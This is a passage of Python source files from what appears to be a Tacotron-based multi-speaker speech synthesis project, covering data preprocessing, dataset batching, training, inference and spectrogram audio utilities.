% (len(metadata), mel_frames, timesteps, hours)) print("Max input length (text chars): %d" % max(len(m[5]) for m in metadata)) print("Max mel frames length: %d" % max(int(m[4]) for m in metadata)) print("Max audio timesteps length: %d" % max(int(m[3]) for m in metadata)) def preprocess_speaker(speaker_dir, out_dir: Path, skip_existing: bool, hparams, no_alignments: bool): metadata = [] for book_dir in speaker_dir.glob("*"): if no_alignments: # Gather the utterance audios and texts # LibriTTS uses .wav but we will include extensions for compatibility with other datasets extensions = ["*.wav", "*.flac", "*.mp3"] for extension in extensions: wav_fpaths = book_dir.glob(extension) for wav_fpath in wav_fpaths: # Load the audio waveform wav, _ = librosa.load(str(wav_fpath), hparams.sample_rate) if hparams.rescale: wav = wav / np.abs(wav).max() * hparams.rescaling_max # Get the corresponding text # Check for .txt (for compatibility with other datasets) text_fpath = wav_fpath.with_suffix(".txt") if not text_fpath.exists(): # Check for .normalized.txt (LibriTTS) text_fpath = wav_fpath.with_suffix(".normalized.txt") assert text_fpath.exists() with text_fpath.open("r") as text_file: text = "".join([line for line in text_file]) text = text.replace("\"", "") text = text.strip() # Process the utterance metadata.append(process_utterance(wav, text, out_dir, str(wav_fpath.with_suffix("").name), skip_existing, hparams)) else: # Process alignment file (LibriSpeech support) # Gather the utterance audios and texts try: alignments_fpath = next(book_dir.glob("*.alignment.txt")) with alignments_fpath.open("r") as alignments_file: alignments = [line.rstrip().split(" ") for line in alignments_file] except StopIteration: # A few alignment files will be missing continue # Iterate over each entry in the alignments file for wav_fname, words, end_times in alignments: wav_fpath = book_dir.joinpath(wav_fname + ".flac") assert wav_fpath.exists() words = words.replace("\"", "").split(",") end_times = list(map(float, end_times.replace("\"", "").split(","))) # Process each sub-utterance wavs, texts = split_on_silences(wav_fpath, words, end_times, hparams) for i, (wav, text) in enumerate(zip(wavs, texts)): sub_basename = "%s_%02d" % (wav_fname, i) metadata.append(process_utterance(wav, text, out_dir, sub_basename, skip_existing, hparams)) return [m for m in metadata if m is not None] def split_on_silences(wav_fpath, words, end_times, hparams): # Load the audio waveform wav, _ = librosa.load(str(wav_fpath), hparams.sample_rate) if hparams.rescale: wav = wav / np.abs(wav).max() * hparams.rescaling_max words = np.array(words) start_times = np.array([0.0] + end_times[:-1]) end_times = np.array(end_times) assert len(words) == len(end_times) == len(start_times) assert words[0] == "" and words[-1] == "" # Find pauses that are too long mask = (words == "") & (end_times - start_times >= hparams.silence_min_duration_split) mask[0] = mask[-1] = True breaks = np.where(mask)[0] # Profile the noise from the silences and perform noise reduction on the waveform silence_times = [[start_times[i], end_times[i]] for i in breaks] silence_times = (np.array(silence_times) * hparams.sample_rate).astype(np.int) noisy_wav = np.concatenate([wav[stime[0]:stime[1]] for stime in silence_times]) if len(noisy_wav) > hparams.sample_rate * 0.02: profile = logmmse.profile_noise(noisy_wav, hparams.sample_rate) wav = logmmse.denoise(wav, profile, eta=0) # Re-attach segments that are too short segments = list(zip(breaks[:-1], breaks[1:])) segment_durations = 
[start_times[end] - end_times[start] for start, end in segments] i = 0 while i < len(segments) and len(segments) > 1: if segment_durations[i] < hparams.utterance_min_duration: # See if the segment can be re-attached with the right or the left segment left_duration = float("inf") if i == 0 else segment_durations[i - 1] right_duration = float("inf") if i == len(segments) - 1 else segment_durations[i + 1] joined_duration = segment_durations[i] + min(left_duration, right_duration) # Do not re-attach if it causes the joined utterance to be too long if joined_duration > hparams.hop_size * hparams.max_mel_frames / hparams.sample_rate: i += 1 continue # Re-attach the segment with the neighbour of shortest duration j = i - 1 if left_duration <= right_duration else i segments[j] = (segments[j][0], segments[j + 1][1]) segment_durations[j] = joined_duration del segments[j + 1], segment_durations[j + 1] else: i += 1 # Split the utterance segment_times = [[end_times[start], start_times[end]] for start, end in segments] segment_times = (np.array(segment_times) * hparams.sample_rate).astype(np.int) wavs = [wav[segment_time[0]:segment_time[1]] for segment_time in segment_times] texts = [" ".join(words[start + 1:end]).replace(" ", " ") for start, end in segments] # # DEBUG: play the audio segments (run with -n=1) # import sounddevice as sd # if len(wavs) > 1: # print("This sentence was split in %d segments:" % len(wavs)) # else: # print("There are no silences long enough for this sentence to be split:") # for wav, text in zip(wavs, texts): # # Pad the waveform with 1 second of silence because sounddevice tends to cut them early # # when playing them. You shouldn't need to do that in your parsers. # wav = np.concatenate((wav, [0] * 16000)) # print("\t%s" % text) # sd.play(wav, 16000, blocking=True) # print("") return wavs, texts def process_utterance(wav: np.ndarray, text: str, out_dir: Path, basename: str, skip_existing: bool, hparams): ## FOR REFERENCE: # For you not to lose your head if you ever wish to change things here or implement your own # synthesizer. # - Both the audios and the mel spectrograms are saved as numpy arrays # - There is no processing done to the audios that will be saved to disk beyond volume # normalization (in split_on_silences) # - However, pre-emphasis is applied to the audios before computing the mel spectrogram. This # is why we re-apply it on the audio on the side of the vocoder. # - Librosa pads the waveform before computing the mel spectrogram. Here, the waveform is saved # without extra padding. This means that you won't have an exact relation between the length # of the wav and of the mel spectrogram. See the vocoder data loader. 
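    # - Each successfully processed utterance contributes one "|"-separated line to train.txt
    #   via the tuple returned at the bottom of this function; purely for illustration (the
    #   names and numbers below are made up), such a line looks like:
    #     audio-sample_00.npy|mel-sample_00.npy|embed-sample_00.npy|54400|273|some transcript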
# Skip existing utterances if needed mel_fpath = out_dir.joinpath("mels", "mel-%s.npy" % basename) wav_fpath = out_dir.joinpath("audio", "audio-%s.npy" % basename) if skip_existing and mel_fpath.exists() and wav_fpath.exists(): return None # Trim silence if hparams.trim_silence: wav = encoder.preprocess_wav(wav, normalize=False, trim_silence=True) # Skip utterances that are too short if len(wav) < hparams.utterance_min_duration * hparams.sample_rate: return None # Compute the mel spectrogram mel_spectrogram = audio.melspectrogram(wav, hparams).astype(np.float32) mel_frames = mel_spectrogram.shape[1] # Skip utterances that are too long if mel_frames > hparams.max_mel_frames and hparams.clip_mels_length: return None # Write the spectrogram, embed and audio to disk np.save(mel_fpath, mel_spectrogram.T, allow_pickle=False) np.save(wav_fpath, wav, allow_pickle=False) # Return a tuple describing this training example return wav_fpath.name, mel_fpath.name, "embed-%s.npy" % basename, len(wav), mel_frames, text def embed_utterance(fpaths, encoder_model_fpath): if not encoder.is_loaded(): encoder.load_model(encoder_model_fpath) # Compute the speaker embedding of the utterance wav_fpath, embed_fpath = fpaths wav = np.load(wav_fpath) wav = encoder.preprocess_wav(wav) embed = encoder.embed_utterance(wav) np.save(embed_fpath, embed, allow_pickle=False) def create_embeddings(synthesizer_root: Path, encoder_model_fpath: Path, n_processes: int): wav_dir = synthesizer_root.joinpath("audio") metadata_fpath = synthesizer_root.joinpath("train.txt") assert wav_dir.exists() and metadata_fpath.exists() embed_dir = synthesizer_root.joinpath("embeds") embed_dir.mkdir(exist_ok=True) # Gather the input wave filepath and the target output embed filepath with metadata_fpath.open("r") as metadata_file: metadata = [line.split("|") for line in metadata_file] fpaths = [(wav_dir.joinpath(m[0]), embed_dir.joinpath(m[2])) for m in metadata] # TODO: improve on the multiprocessing, it's terrible. Disk I/O is the bottleneck here. 
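    # For debugging, the pool below can be replaced by an equivalent serial loop
    # (a commented sketch that produces the same embedding files):
    #   for fpath_pair in tqdm(fpaths, "Embedding", unit="utterances"):
    #       embed_utterance(fpath_pair, encoder_model_fpath=encoder_model_fpath)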
# Embed the utterances in separate threads func = partial(embed_utterance, encoder_model_fpath=encoder_model_fpath) job = Pool(n_processes).imap(func, fpaths) list(tqdm(job, "Embedding", len(fpaths), unit="utterances")) File: synthesizer/synthesizer_dataset.py import torch from torch.utils.data import Dataset import numpy as np from pathlib import Path from synthesizer.utils.text import text_to_sequence class SynthesizerDataset(Dataset): def __init__(self, metadata_fpath: Path, mel_dir: Path, embed_dir: Path, hparams): print("Using inputs from:\n\t%s\n\t%s\n\t%s" % (metadata_fpath, mel_dir, embed_dir)) with metadata_fpath.open("r") as metadata_file: metadata = [line.split("|") for line in metadata_file] mel_fnames = [x[1] for x in metadata if int(x[4])] mel_fpaths = [mel_dir.joinpath(fname) for fname in mel_fnames] embed_fnames = [x[2] for x in metadata if int(x[4])] embed_fpaths = [embed_dir.joinpath(fname) for fname in embed_fnames] self.samples_fpaths = list(zip(mel_fpaths, embed_fpaths)) self.samples_texts = [x[5].strip() for x in metadata if int(x[4])] self.metadata = metadata self.hparams = hparams print("Found %d samples" % len(self.samples_fpaths)) def __getitem__(self, index): # Sometimes index may be a list of 2 (not sure why this happens) # If that is the case, return a single item corresponding to first element in index if index is list: index = index[0] mel_path, embed_path = self.samples_fpaths[index] mel = np.load(mel_path).T.astype(np.float32) # Load the embed embed = np.load(embed_path) # Get the text and clean it text = text_to_sequence(self.samples_texts[index], self.hparams.tts_cleaner_names) # Convert the list returned by text_to_sequence to a numpy array text = np.asarray(text).astype(np.int32) return text, mel.astype(np.float32), embed.astype(np.float32), index def __len__(self): return len(self.samples_fpaths) def collate_synthesizer(batch, r, hparams): # Text x_lens = [len(x[0]) for x in batch] max_x_len = max(x_lens) chars = [pad1d(x[0], max_x_len) for x in batch] chars = np.stack(chars) # Mel spectrogram spec_lens = [x[1].shape[-1] for x in batch] max_spec_len = max(spec_lens) + 1 if max_spec_len % r != 0: max_spec_len += r - max_spec_len % r # WaveRNN mel spectrograms are normalized to [0, 1] so zero padding adds silence # By default, SV2TTS uses symmetric mels, where -1*max_abs_value is silence. 
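    # With the default hparams (symmetric_mels=True, max_abs_value=4.0) this picks a pad
    # value of -4.0, i.e. padded frames are pure silence; with symmetric_mels=False the
    # pad value would be 0 instead.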
if hparams.symmetric_mels: mel_pad_value = -1 * hparams.max_abs_value else: mel_pad_value = 0 mel = [pad2d(x[1], max_spec_len, pad_value=mel_pad_value) for x in batch] mel = np.stack(mel) # Speaker embedding (SV2TTS) embeds = np.array([x[2] for x in batch]) # Index (for vocoder preprocessing) indices = [x[3] for x in batch] # Convert all to tensor chars = torch.tensor(chars).long() mel = torch.tensor(mel) embeds = torch.tensor(embeds) return chars, mel, embeds, indices def pad1d(x, max_len, pad_value=0): return np.pad(x, (0, max_len - len(x)), mode="constant", constant_values=pad_value) def pad2d(x, max_len, pad_value=0): return np.pad(x, ((0, 0), (0, max_len - x.shape[-1])), mode="constant", constant_values=pad_value) File: synthesizer/__init__.py # File: synthesizer/synthesize.py import platform from functools import partial from pathlib import Path import numpy as np import torch from torch.utils.data import DataLoader from tqdm import tqdm from synthesizer.hparams import hparams_debug_string from synthesizer.models.tacotron import Tacotron from synthesizer.synthesizer_dataset import SynthesizerDataset, collate_synthesizer from synthesizer.utils import data_parallel_workaround from synthesizer.utils.symbols import symbols def run_synthesis(in_dir: Path, out_dir: Path, syn_model_fpath: Path, hparams): # This generates ground truth-aligned mels for vocoder training synth_dir = out_dir / "mels_gta" synth_dir.mkdir(exist_ok=True, parents=True) print(hparams_debug_string()) # Check for GPU if torch.cuda.is_available(): device = torch.device("cuda") if hparams.synthesis_batch_size % torch.cuda.device_count() != 0: raise ValueError("`hparams.synthesis_batch_size` must be evenly divisible by n_gpus!") else: device = torch.device("cpu") print("Synthesizer using device:", device) # Instantiate Tacotron model model = Tacotron(embed_dims=hparams.tts_embed_dims, num_chars=len(symbols), encoder_dims=hparams.tts_encoder_dims, decoder_dims=hparams.tts_decoder_dims, n_mels=hparams.num_mels, fft_bins=hparams.num_mels, postnet_dims=hparams.tts_postnet_dims, encoder_K=hparams.tts_encoder_K, lstm_dims=hparams.tts_lstm_dims, postnet_K=hparams.tts_postnet_K, num_highways=hparams.tts_num_highways, dropout=0., # Use zero dropout for gta mels stop_threshold=hparams.tts_stop_threshold, speaker_embedding_size=hparams.speaker_embedding_size).to(device) # Load the weights print("\nLoading weights at %s" % syn_model_fpath) model.load(syn_model_fpath) print("Tacotron weights loaded from step %d" % model.step) # Synthesize using same reduction factor as the model is currently trained r = np.int32(model.r) # Set model to eval mode (disable gradient and zoneout) model.eval() # Initialize the dataset metadata_fpath = in_dir.joinpath("train.txt") mel_dir = in_dir.joinpath("mels") embed_dir = in_dir.joinpath("embeds") dataset = SynthesizerDataset(metadata_fpath, mel_dir, embed_dir, hparams) collate_fn = partial(collate_synthesizer, r=r, hparams=hparams) data_loader = DataLoader(dataset, hparams.synthesis_batch_size, collate_fn=collate_fn, num_workers=2) # Generate GTA mels meta_out_fpath = out_dir / "synthesized.txt" with meta_out_fpath.open("w") as file: for i, (texts, mels, embeds, idx) in tqdm(enumerate(data_loader), total=len(data_loader)): texts, mels, embeds = texts.to(device), mels.to(device), embeds.to(device) # Parallelize model onto GPUS using workaround due to python bug if device.type == "cuda" and torch.cuda.device_count() > 1: _, mels_out, _ = data_parallel_workaround(model, texts, mels, embeds) else: _, 
mels_out, _, _ = model(texts, mels, embeds) for j, k in enumerate(idx): # Note: outputs mel-spectrogram files and target ones have same names, just different folders mel_filename = Path(synth_dir).joinpath(dataset.metadata[k][1]) mel_out = mels_out[j].detach().cpu().numpy().T # Use the length of the ground truth mel to remove padding from the generated mels mel_out = mel_out[:int(dataset.metadata[k][4])] # Write the spectrogram to disk np.save(mel_filename, mel_out, allow_pickle=False) # Write metadata into the synthesized file file.write("|".join(dataset.metadata[k])) File: synthesizer/train.py from datetime import datetime from functools import partial from pathlib import Path import torch import torch.nn.functional as F from torch import optim from torch.utils.data import DataLoader from synthesizer import audio from synthesizer.models.tacotron import Tacotron from synthesizer.synthesizer_dataset import SynthesizerDataset, collate_synthesizer from synthesizer.utils import ValueWindow, data_parallel_workaround from synthesizer.utils.plot import plot_spectrogram from synthesizer.utils.symbols import symbols from synthesizer.utils.text import sequence_to_text from vocoder.display import * def np_now(x: torch.Tensor): return x.detach().cpu().numpy() def time_string(): return datetime.now().strftime("%Y-%m-%d %H:%M") def train(run_id: str, syn_dir: Path, models_dir: Path, save_every: int, backup_every: int, force_restart: bool, hparams): models_dir.mkdir(exist_ok=True) model_dir = models_dir.joinpath(run_id) plot_dir = model_dir.joinpath("plots") wav_dir = model_dir.joinpath("wavs") mel_output_dir = model_dir.joinpath("mel-spectrograms") meta_folder = model_dir.joinpath("metas") model_dir.mkdir(exist_ok=True) plot_dir.mkdir(exist_ok=True) wav_dir.mkdir(exist_ok=True) mel_output_dir.mkdir(exist_ok=True) meta_folder.mkdir(exist_ok=True) weights_fpath = model_dir / f"synthesizer.pt" metadata_fpath = syn_dir.joinpath("train.txt") print("Checkpoint path: {}".format(weights_fpath)) print("Loading training data from: {}".format(metadata_fpath)) print("Using model: Tacotron") # Bookkeeping time_window = ValueWindow(100) loss_window = ValueWindow(100) # From WaveRNN/train_tacotron.py if torch.cuda.is_available(): device = torch.device("cuda") for session in hparams.tts_schedule: _, _, _, batch_size = session if batch_size % torch.cuda.device_count() != 0: raise ValueError("`batch_size` must be evenly divisible by n_gpus!") else: device = torch.device("cpu") print("Using device:", device) # Instantiate Tacotron Model print("\nInitialising Tacotron Model...\n") model = Tacotron(embed_dims=hparams.tts_embed_dims, num_chars=len(symbols), encoder_dims=hparams.tts_encoder_dims, decoder_dims=hparams.tts_decoder_dims, n_mels=hparams.num_mels, fft_bins=hparams.num_mels, postnet_dims=hparams.tts_postnet_dims, encoder_K=hparams.tts_encoder_K, lstm_dims=hparams.tts_lstm_dims, postnet_K=hparams.tts_postnet_K, num_highways=hparams.tts_num_highways, dropout=hparams.tts_dropout, stop_threshold=hparams.tts_stop_threshold, speaker_embedding_size=hparams.speaker_embedding_size).to(device) # Initialize the optimizer optimizer = optim.Adam(model.parameters()) # Load the weights if force_restart or not weights_fpath.exists(): print("\nStarting the training of Tacotron from scratch\n") model.save(weights_fpath) # Embeddings metadata char_embedding_fpath = meta_folder.joinpath("CharacterEmbeddings.tsv") with open(char_embedding_fpath, "w", encoding="utf-8") as f: for symbol in symbols: if symbol == " ": symbol = "\\s" # For 
visual purposes, swap space with \s f.write("{}\n".format(symbol)) else: print("\nLoading weights at %s" % weights_fpath) model.load(weights_fpath, optimizer) print("Tacotron weights loaded from step %d" % model.step) # Initialize the dataset metadata_fpath = syn_dir.joinpath("train.txt") mel_dir = syn_dir.joinpath("mels") embed_dir = syn_dir.joinpath("embeds") dataset = SynthesizerDataset(metadata_fpath, mel_dir, embed_dir, hparams) for i, session in enumerate(hparams.tts_schedule): current_step = model.get_step() r, lr, max_step, batch_size = session training_steps = max_step - current_step # Do we need to change to the next session? if current_step >= max_step: # Are there no further sessions than the current one? if i == len(hparams.tts_schedule) - 1: # We have completed training. Save the model and exit model.save(weights_fpath, optimizer) break else: # There is a following session, go to it continue model.r = r # Begin the training simple_table([(f"Steps with r={r}", str(training_steps // 1000) + "k Steps"), ("Batch Size", batch_size), ("Learning Rate", lr), ("Outputs/Step (r)", model.r)]) for p in optimizer.param_groups: p["lr"] = lr collate_fn = partial(collate_synthesizer, r=r, hparams=hparams) data_loader = DataLoader(dataset, batch_size, shuffle=True, num_workers=2, collate_fn=collate_fn) total_iters = len(dataset) steps_per_epoch = np.ceil(total_iters / batch_size).astype(np.int32) epochs = np.ceil(training_steps / steps_per_epoch).astype(np.int32) for epoch in range(1, epochs+1): for i, (texts, mels, embeds, idx) in enumerate(data_loader, 1): start_time = time.time() # Generate stop tokens for training stop = torch.ones(mels.shape[0], mels.shape[2]) for j, k in enumerate(idx): stop[j, :int(dataset.metadata[k][4])-1] = 0 texts = texts.to(device) mels = mels.to(device) embeds = embeds.to(device) stop = stop.to(device) # Forward pass # Parallelize model onto GPUS using workaround due to python bug if device.type == "cuda" and torch.cuda.device_count() > 1: m1_hat, m2_hat, attention, stop_pred = data_parallel_workaround(model, texts, mels, embeds) else: m1_hat, m2_hat, attention, stop_pred = model(texts, mels, embeds) # Backward pass m1_loss = F.mse_loss(m1_hat, mels) + F.l1_loss(m1_hat, mels) m2_loss = F.mse_loss(m2_hat, mels) stop_loss = F.binary_cross_entropy(stop_pred, stop) loss = m1_loss + m2_loss + stop_loss optimizer.zero_grad() loss.backward() if hparams.tts_clip_grad_norm is not None: grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), hparams.tts_clip_grad_norm) if np.isnan(grad_norm.cpu()): print("grad_norm was NaN!") optimizer.step() time_window.append(time.time() - start_time) loss_window.append(loss.item()) step = model.get_step() k = step // 1000 msg = f"| Epoch: {epoch}/{epochs} ({i}/{steps_per_epoch}) | Loss: {loss_window.average:#.4} | " \ f"{1./time_window.average:#.2} steps/s | Step: {k}k | " stream(msg) # Backup or save model as appropriate if backup_every != 0 and step % backup_every == 0 : backup_fpath = weights_fpath.parent / f"synthesizer_{k:06d}.pt" model.save(backup_fpath, optimizer) if save_every != 0 and step % save_every == 0 : # Must save latest optimizer state to ensure that resuming training # doesn't produce artifacts model.save(weights_fpath, optimizer) # Evaluate model to generate samples epoch_eval = hparams.tts_eval_interval == -1 and i == steps_per_epoch # If epoch is done step_eval = hparams.tts_eval_interval > 0 and step % hparams.tts_eval_interval == 0 # Every N steps if epoch_eval or step_eval: for sample_idx in 
range(hparams.tts_eval_num_samples): # At most, generate samples equal to number in the batch if sample_idx + 1 <= len(texts): # Remove padding from mels using frame length in metadata mel_length = int(dataset.metadata[idx[sample_idx]][4]) mel_prediction = np_now(m2_hat[sample_idx]).T[:mel_length] target_spectrogram = np_now(mels[sample_idx]).T[:mel_length] attention_len = mel_length // model.r eval_model(attention=np_now(attention[sample_idx][:, :attention_len]), mel_prediction=mel_prediction, target_spectrogram=target_spectrogram, input_seq=np_now(texts[sample_idx]), step=step, plot_dir=plot_dir, mel_output_dir=mel_output_dir, wav_dir=wav_dir, sample_num=sample_idx + 1, loss=loss, hparams=hparams) # Break out of loop to update training schedule if step >= max_step: break # Add line break after every epoch print("") def eval_model(attention, mel_prediction, target_spectrogram, input_seq, step, plot_dir, mel_output_dir, wav_dir, sample_num, loss, hparams): # Save some results for evaluation attention_path = str(plot_dir.joinpath("attention_step_{}_sample_{}".format(step, sample_num))) save_attention(attention, attention_path) # save predicted mel spectrogram to disk (debug) mel_output_fpath = mel_output_dir.joinpath("mel-prediction-step-{}_sample_{}.npy".format(step, sample_num)) np.save(str(mel_output_fpath), mel_prediction, allow_pickle=False) # save griffin lim inverted wav for debug (mel -> wav) wav = audio.inv_mel_spectrogram(mel_prediction.T, hparams) wav_fpath = wav_dir.joinpath("step-{}-wave-from-mel_sample_{}.wav".format(step, sample_num)) audio.save_wav(wav, str(wav_fpath), sr=hparams.sample_rate) # save real and predicted mel-spectrogram plot to disk (control purposes) spec_fpath = plot_dir.joinpath("step-{}-mel-spectrogram_sample_{}.png".format(step, sample_num)) title_str = "{}, {}, step={}, loss={:.5f}".format("Tacotron", time_string(), step, loss) plot_spectrogram(mel_prediction, str(spec_fpath), title=title_str, target_spectrogram=target_spectrogram, max_len=target_spectrogram.size // hparams.num_mels) print("Input at step {}: {}".format(step, sequence_to_text(input_seq))) File: synthesizer/inference.py import torch from synthesizer import audio from synthesizer.hparams import hparams from synthesizer.models.tacotron import Tacotron from synthesizer.utils.symbols import symbols from synthesizer.utils.text import text_to_sequence from vocoder.display import simple_table from pathlib import Path from typing import Union, List import numpy as np import librosa class Synthesizer: sample_rate = hparams.sample_rate hparams = hparams def __init__(self, model_fpath: Path, verbose=True): """ The model isn't instantiated and loaded in memory until needed or until load() is called. :param model_fpath: path to the trained model file :param verbose: if False, prints less information when using the model """ self.model_fpath = model_fpath self.verbose = verbose # Check for GPU if torch.cuda.is_available(): self.device = torch.device("cuda") else: self.device = torch.device("cpu") if self.verbose: print("Synthesizer using device:", self.device) # Tacotron model will be instantiated later on first use. self._model = None def is_loaded(self): """ Whether the model is loaded in memory. """ return self._model is not None def load(self): """ Instantiates and loads the model given the weights file that was passed in the constructor. 
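
        Calling this explicitly is optional: synthesize_spectrograms() loads the model on
        first use. A typical sequence looks like the following sketch, where the model path
        is hypothetical and `embed` stands for a 256-dimensional speaker embedding produced
        by the encoder:

            synthesizer = Synthesizer(Path("saved_models/default/synthesizer.pt"))
            synthesizer.load()
            [spec] = synthesizer.synthesize_spectrograms(["Hello world."], [embed])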
""" self._model = Tacotron(embed_dims=hparams.tts_embed_dims, num_chars=len(symbols), encoder_dims=hparams.tts_encoder_dims, decoder_dims=hparams.tts_decoder_dims, n_mels=hparams.num_mels, fft_bins=hparams.num_mels, postnet_dims=hparams.tts_postnet_dims, encoder_K=hparams.tts_encoder_K, lstm_dims=hparams.tts_lstm_dims, postnet_K=hparams.tts_postnet_K, num_highways=hparams.tts_num_highways, dropout=hparams.tts_dropout, stop_threshold=hparams.tts_stop_threshold, speaker_embedding_size=hparams.speaker_embedding_size).to(self.device) self._model.load(self.model_fpath) self._model.eval() if self.verbose: print("Loaded synthesizer \"%s\" trained to step %d" % (self.model_fpath.name, self._model.state_dict()["step"])) def synthesize_spectrograms(self, texts: List[str], embeddings: Union[np.ndarray, List[np.ndarray]], return_alignments=False): """ Synthesizes mel spectrograms from texts and speaker embeddings. :param texts: a list of N text prompts to be synthesized :param embeddings: a numpy array or list of speaker embeddings of shape (N, 256) :param return_alignments: if True, a matrix representing the alignments between the characters and each decoder output step will be returned for each spectrogram :return: a list of N melspectrograms as numpy arrays of shape (80, Mi), where Mi is the sequence length of spectrogram i, and possibly the alignments. """ # Load the model on the first request. if not self.is_loaded(): self.load() # Preprocess text inputs inputs = [text_to_sequence(text.strip(), hparams.tts_cleaner_names) for text in texts] if not isinstance(embeddings, list): embeddings = [embeddings] # Batch inputs batched_inputs = [inputs[i:i+hparams.synthesis_batch_size] for i in range(0, len(inputs), hparams.synthesis_batch_size)] batched_embeds = [embeddings[i:i+hparams.synthesis_batch_size] for i in range(0, len(embeddings), hparams.synthesis_batch_size)] specs = [] for i, batch in enumerate(batched_inputs, 1): if self.verbose: print(f"\n| Generating {i}/{len(batched_inputs)}") # Pad texts so they are all the same length text_lens = [len(text) for text in batch] max_text_len = max(text_lens) chars = [pad1d(text, max_text_len) for text in batch] chars = np.stack(chars) # Stack speaker embeddings into 2D array for batch processing speaker_embeds = np.stack(batched_embeds[i-1]) # Convert to tensor chars = torch.tensor(chars).long().to(self.device) speaker_embeddings = torch.tensor(speaker_embeds).float().to(self.device) # Inference _, mels, alignments = self._model.generate(chars, speaker_embeddings) mels = mels.detach().cpu().numpy() for m in mels: # Trim silence from end of each spectrogram while np.max(m[:, -1]) < hparams.tts_stop_threshold: m = m[:, :-1] specs.append(m) if self.verbose: print("\n\nDone.\n") return (specs, alignments) if return_alignments else specs @staticmethod def load_preprocess_wav(fpath): """ Loads and preprocesses an audio file under the same conditions the audio files were used to train the synthesizer. """ wav = librosa.load(str(fpath), hparams.sample_rate)[0] if hparams.rescale: wav = wav / np.abs(wav).max() * hparams.rescaling_max return wav @staticmethod def make_spectrogram(fpath_or_wav: Union[str, Path, np.ndarray]): """ Creates a mel spectrogram from an audio file in the same manner as the mel spectrograms that were fed to the synthesizer when training. 
""" if isinstance(fpath_or_wav, str) or isinstance(fpath_or_wav, Path): wav = Synthesizer.load_preprocess_wav(fpath_or_wav) else: wav = fpath_or_wav mel_spectrogram = audio.melspectrogram(wav, hparams).astype(np.float32) return mel_spectrogram @staticmethod def griffin_lim(mel): """ Inverts a mel spectrogram using Griffin-Lim. The mel spectrogram is expected to have been built with the same parameters present in hparams.py. """ return audio.inv_mel_spectrogram(mel, hparams) def pad1d(x, max_len, pad_value=0): return np.pad(x, (0, max_len - len(x)), mode="constant", constant_values=pad_value) File: synthesizer/audio.py import librosa import librosa.filters import numpy as np from scipy import signal from scipy.io import wavfile import soundfile as sf def load_wav(path, sr): return librosa.core.load(path, sr=sr)[0] def save_wav(wav, path, sr): wav *= 32767 / max(0.01, np.max(np.abs(wav))) #proposed by @dsmiller wavfile.write(path, sr, wav.astype(np.int16)) def save_wavenet_wav(wav, path, sr): sf.write(path, wav.astype(np.float32), sr) def preemphasis(wav, k, preemphasize=True): if preemphasize: return signal.lfilter([1, -k], [1], wav) return wav def inv_preemphasis(wav, k, inv_preemphasize=True): if inv_preemphasize: return signal.lfilter([1], [1, -k], wav) return wav #From https://github.com/r9y9/wavenet_vocoder/blob/master/audio.py def start_and_end_indices(quantized, silence_threshold=2): for start in range(quantized.size): if abs(quantized[start] - 127) > silence_threshold: break for end in range(quantized.size - 1, 1, -1): if abs(quantized[end] - 127) > silence_threshold: break assert abs(quantized[start] - 127) > silence_threshold assert abs(quantized[end] - 127) > silence_threshold return start, end def get_hop_size(hparams): hop_size = hparams.hop_size if hop_size is None: assert hparams.frame_shift_ms is not None hop_size = int(hparams.frame_shift_ms / 1000 * hparams.sample_rate) return hop_size def linearspectrogram(wav, hparams): D = _stft(preemphasis(wav, hparams.preemphasis, hparams.preemphasize), hparams) S = _amp_to_db(np.abs(D), hparams) - hparams.ref_level_db if hparams.signal_normalization: return _normalize(S, hparams) return S def melspectrogram(wav, hparams): D = _stft(preemphasis(wav, hparams.preemphasis, hparams.preemphasize), hparams) S = _amp_to_db(_linear_to_mel(np.abs(D), hparams), hparams) - hparams.ref_level_db if hparams.signal_normalization: return _normalize(S, hparams) return S def inv_linear_spectrogram(linear_spectrogram, hparams): """Converts linear spectrogram to waveform using librosa""" if hparams.signal_normalization: D = _denormalize(linear_spectrogram, hparams) else: D = linear_spectrogram S = _db_to_amp(D + hparams.ref_level_db) #Convert back to linear if hparams.use_lws: processor = _lws_processor(hparams) D = processor.run_lws(S.astype(np.float64).T ** hparams.power) y = processor.istft(D).astype(np.float32) return inv_preemphasis(y, hparams.preemphasis, hparams.preemphasize) else: return inv_preemphasis(_griffin_lim(S ** hparams.power, hparams), hparams.preemphasis, hparams.preemphasize) def inv_mel_spectrogram(mel_spectrogram, hparams): """Converts mel spectrogram to waveform using librosa""" if hparams.signal_normalization: D = _denormalize(mel_spectrogram, hparams) else: D = mel_spectrogram S = _mel_to_linear(_db_to_amp(D + hparams.ref_level_db), hparams) # Convert back to linear if hparams.use_lws: processor = _lws_processor(hparams) D = processor.run_lws(S.astype(np.float64).T ** hparams.power) y = processor.istft(D).astype(np.float32) 
return inv_preemphasis(y, hparams.preemphasis, hparams.preemphasize) else: return inv_preemphasis(_griffin_lim(S ** hparams.power, hparams), hparams.preemphasis, hparams.preemphasize) def _lws_processor(hparams): import lws return lws.lws(hparams.n_fft, get_hop_size(hparams), fftsize=hparams.win_size, mode="speech") def _griffin_lim(S, hparams): """librosa implementation of Griffin-Lim Based on https://github.com/librosa/librosa/issues/434 """ angles = np.exp(2j * np.pi * np.random.rand(*S.shape)) S_complex = np.abs(S).astype(np.complex) y = _istft(S_complex * angles, hparams) for i in range(hparams.griffin_lim_iters): angles = np.exp(1j * np.angle(_stft(y, hparams))) y = _istft(S_complex * angles, hparams) return y def _stft(y, hparams): if hparams.use_lws: return _lws_processor(hparams).stft(y).T else: return librosa.stft(y=y, n_fft=hparams.n_fft, hop_length=get_hop_size(hparams), win_length=hparams.win_size) def _istft(y, hparams): return librosa.istft(y, hop_length=get_hop_size(hparams), win_length=hparams.win_size) ########################################################## #Those are only correct when using lws!!! (This was messing with Wavenet quality for a long time!) def num_frames(length, fsize, fshift): """Compute number of time frames of spectrogram """ pad = (fsize - fshift) if length % fshift == 0: M = (length + pad * 2 - fsize) // fshift + 1 else: M = (length + pad * 2 - fsize) // fshift + 2 return M def pad_lr(x, fsize, fshift): """Compute left and right padding """ M = num_frames(len(x), fsize, fshift) pad = (fsize - fshift) T = len(x) + 2 * pad r = (M - 1) * fshift + fsize - T return pad, pad + r ########################################################## #Librosa correct padding def librosa_pad_lr(x, fsize, fshift): return 0, (x.shape[0] // fshift + 1) * fshift - x.shape[0] # Conversions _mel_basis = None _inv_mel_basis = None def _linear_to_mel(spectogram, hparams): global _mel_basis if _mel_basis is None: _mel_basis = _build_mel_basis(hparams) return np.dot(_mel_basis, spectogram) def _mel_to_linear(mel_spectrogram, hparams): global _inv_mel_basis if _inv_mel_basis is None: _inv_mel_basis = 